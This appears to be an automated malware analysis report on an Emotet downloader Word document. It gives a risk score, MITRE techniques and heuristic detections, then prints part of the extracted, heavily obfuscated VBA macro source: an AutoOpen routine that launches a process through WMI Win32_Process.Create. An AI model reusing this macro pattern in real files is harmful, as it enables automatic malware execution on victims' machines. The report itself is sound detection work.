MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1105 Ingress Tool Transfer
The sample contains a critical heuristic firing for ClamAV detecting it as 'Doc.Downloader.Emotet-6964729-0'. The presence of an AutoOpen VBA macro, coupled with a WMI Win32_Process launcher, strongly indicates that the macro is designed to execute a secondary payload. This is a common technique for Emotet to download and run further malicious code.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6964729-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6964729-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5027 bytes |
SHA-256: beb1b49d22014b9470ba24741a7fb2c137d5f676f8126b2ac55cb5c324510995 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "W01317"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "L480_7"
Attribute VB_Base = "0{E3D6C57D-248A-49A1-B548-3804931D8D12}{056A0379-2A37-4F3A-A9FB-E8D848AF9327}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "n_2_17"
Attribute VB_Name = "u8745387"
Attribute VB_Name = "l9757223"
Attribute VB_Name = "G64_87"
Attribute VB_Base = "0{9ABC67A8-21AE-4515-B5B0-A144B093126D}{03B624B5-4361-42A6-BC7E-9AD2D20A2E50}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "s1_628"
Function w617274(S_803331)
While Z51802_ And z_4_852
'U89237K5324201A946465N6341245
Wend
While W55_10 And n6159879
'w_9113s8_009X05041_O9815210
Wend
While w886_63 And G468873
'i37191j4582917i_740080a94594
Wend
Set w617274 = CVar(S_803331)
While E_1_0_0 And i57108
'n598_9j5303533z358_278s39284
Wend
While L166_30 And a48_8573
't019931z_7560T5172858J66671
Wend
While o9842007 And b5854_
'j_38778w897108D0277058p656691
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While O94970 And Y6_57430
'p933000I65361_3D91885O6391795
Wend
While E86323 And T57940
'U0745884s485613V_1170j28__4_6
Wend
While W63541 And J8415989
'w841331t8278390K032708o59372_
Wend
Call k123262
While w29_640 And J4586364
'F4553377p7805683J66_60_8j1082278
Wend
While C146207 And D67253
'P1396877B4094728f_1785q2484908
Wend
While L757_25 And a25647
'q43981_3H_605516Y5791881b73_45
Wend
End Sub
Attribute VB_Name = "f648233"
Function k123262()
On Error Resume Next
While b577180 And m13946
't568269L290_62Y0835_81B42098
Wend
While R0853820 And U7_880
'f4315_8_r3807330U36126M9_034
Wend
p64849 = L480_7.q__9219.PasswordChar + G64_87.M33726_ + L480_7.q__9219.ControlSource + G64_87.z9_85247 + L480_7.q__9219.PasswordChar + L480_7.q__9219.PasswordChar + G64_87.k2324052 + L480_7.q__9219.PasswordChar + L480_7.q__9219.PasswordChar + G64_87.s08_0964 + L480_7.q__9219.PasswordChar + G64_87.w75836 + L480_7.q__9219.PasswordChar
While E5692_5 And v_817206
'h80_119h9_76320F_8368J781_40
Wend
While i3_4_214 And Y2648757
'f_90__63K82_15z59311s669_68
Wend
While w422_3 And h__6869
'm0_3_3_K3593483V_1788v1471403
Wend
Set s086157 = w617274(GetObject("winmgmts:W" + "in32_Process"))
While p989721 And m6094547
'V54539X609000J439_562c_56496
Wend
While q599374 And A813833
'l113952Z9606_89a3094_93v2277038
Wend
While z48118 And b75137
'J4_1422D06738M53_598r3212943
Wend
s086157.Create k90062 + p64849 + B60157, O9313979, R3_6805_, w379137
While V04_5087 And s58836
'u_2_794M2_43066t_29_83d39444
Wend
While v3762_ And n7752622
'r8_9543d8455190K25_5942E20029_4
Wend
End Function
Attribute VB_Name = "P61126"
Public Function R3_6805_()
While z_9098 And S9127150
'Q417816J5041757i4444538q081882
Wend
While H76094_ And v2150_
'E613454n4_886s31152V105825
Wend
While b29497 And n807224
'd8850488d526_9B795941u22115
Wend
Set R3_6805_ = w617274(GetObject("winmgmts:W" + "in32_ProcessStartup"))
While j7844812 And z80792
'p_2468G__8_19V528877D13406
Wend
While V4546952 And N8122_
'L08680t406665A476420_u113574
Wend
While A
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.